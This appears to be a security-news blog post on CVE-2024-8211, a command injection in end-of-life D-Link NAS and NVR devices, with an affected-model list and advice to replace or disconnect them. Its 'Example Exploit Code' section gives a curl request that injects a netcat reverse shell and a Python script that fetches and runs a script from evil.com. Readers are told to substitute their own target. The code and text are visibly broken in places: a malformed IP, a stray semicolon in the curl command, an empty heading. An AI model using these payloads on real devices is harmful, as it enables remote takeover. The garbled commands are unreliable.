CVE CyberSecurity Database News

CVE-2024-8211 - Critical Command Injection in End-of-Life D-Link NAS Devices — What You Need to Know

Poster -

CVE-2024-8211 is a severe command injection vulnerability in multiple D-Link NAS (Network Attached Storage) and NVR (Network Video Recorder) devices, including popular models like DNS-320, DNS-323, DNS-345, and others. The security flaw resides in the cgi_FMT_Std2R1_DiskMGR function within the /cgi-bin/hd_config.cgi script, specifically in its handling of the f_newly_dev argument. It has been publicly disclosed and reportedly exploited in the wild.

> Devices Affected:
DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-110-4, DNS-120-05, DNS-155-04 (up to 20240814).

Important: All affected products are end-of-life, meaning they are no longer supported or updated by D-Link. The vendor has confirmed this and recommends immediate replacement.

How the Vulnerability Works

The problem lies in improper input validation when processing the f_newly_dev parameter via HTTP requests to /cgi-bin/hd_config.cgi. Remote attackers can inject arbitrary shell commands that the server will execute with elevated privileges.

Attackers do not need to authenticate, making this bug especially dangerous for devices exposed to the internet.

Vulnerability Type

Example Exploit Code

Below is a simple example of how attackers could exploit this using curl on Linux. It triggers a reverse shell to an attacker-controlled server (attacker_ip):

curl "http://TARGET_IP/cgi-bin/hd_config.cgi"; \
  -d "cmd=cgi_FMT_Std2R1_DiskMGR" \
  -d "f_newly_dev=;nc 192..2.123 4444 -e /bin/sh;"

*Replace TARGET_IP with the target device's IP and 192..2.123 4444 with the attacker's listener IP and port.*

What’s Happening Here

- The f_newly_dev parameter is set to ;nc 192..2.123 4444 -e /bin/sh;, using a semicolon (;) to terminate the expected input and start a new system command.

For scripting and automation, the exploit can be packaged in Python as

import requests

target = "http://TARGET_IP/cgi-bin/hd_config.cgi";
payload = ";wget http://evil.com/malware.sh | sh;"

data = {
    "cmd": "cgi_FMT_Std2R1_DiskMGR",
    "f_newly_dev": payload
}

requests.post(target, data=data)

*Again, change the target and payload as required.*

Lateral Movement: Once inside, the attacker can pivot to other devices on your network.

- Data Theft or Destruction: All files stored on the NAS may be stolen, altered, deleted, or held for ransom.
- Botnet Recruitment: Vulnerable NAS units may end up as unwitting members of DDoS botnets or crypto-mining networks.

Affected Models

| Family | Model (Examples) |
|-------------|--------------------|
| DNS-300 | DNS-320, DNS-320L, DNS-320LW, DNS-321, DNS-323, DNS-325, DNS-326, DNS-327L, DNS-343, DNS-345, DNS-340L |
| DNS-100 | DNS-120, DNS-110-4, DNS-120-05 |
| DNR Series | DNR-202L, DNR-322L, DNR-326 |
| Pro Series | DNS-726-4, DNS-155-04 |
| ... | ... |

*If your device matches any of these, it is vulnerable if running firmware released before August 2024.*

What Should You Do?

- Replace the Device Immediately: These models will not receive official patches or support. There is no safe way to keep them online.
- Unplug from the Internet: Until you can retire the device, do not expose it to the internet or untrusted networks.
- Move Data Off Device: Create secure backups and migrate your files to a supported NAS, cloud storage, or another filesystem.

Detailed References

- Vulnerability entry at Vuldb
- Exploit Database entry (if available)
- CERT/CC Notes and Vendor Notice (D-Link End-of-Life)
- SecurityFocus – D-Link NAS vulnerabilities *(not specific, but useful for background)*

Why Is This So Serious?

This vulnerability echoes some of the most notorious NAS bugs in history—simple, unauthenticated, and allows full device compromise from anywhere. Since these devices are often used in homes and businesses, sometimes with critical backups, the risk is substantial.

If you still use one of these D-Link products, it's time to retire it. No firewall can fully protect it from a determined attacker, and D-Link will not release a fix.

Devices are no longer supported (End-of-Life).

Take this seriously: this is the type of vulnerability that criminals and botnet operators love to exploit at scale. Take action now to protect your network, your files, and your privacy.


Stay Safe, <br>Team Security


*For more details and the latest updates, track vuldb.com CVE-2024-8211 or monitor D-Link’s security advisories page.*

Timeline

Published on: 08/27/2024 19:15:18 UTC
Last modified on: 08/29/2024 15:54:56 UTC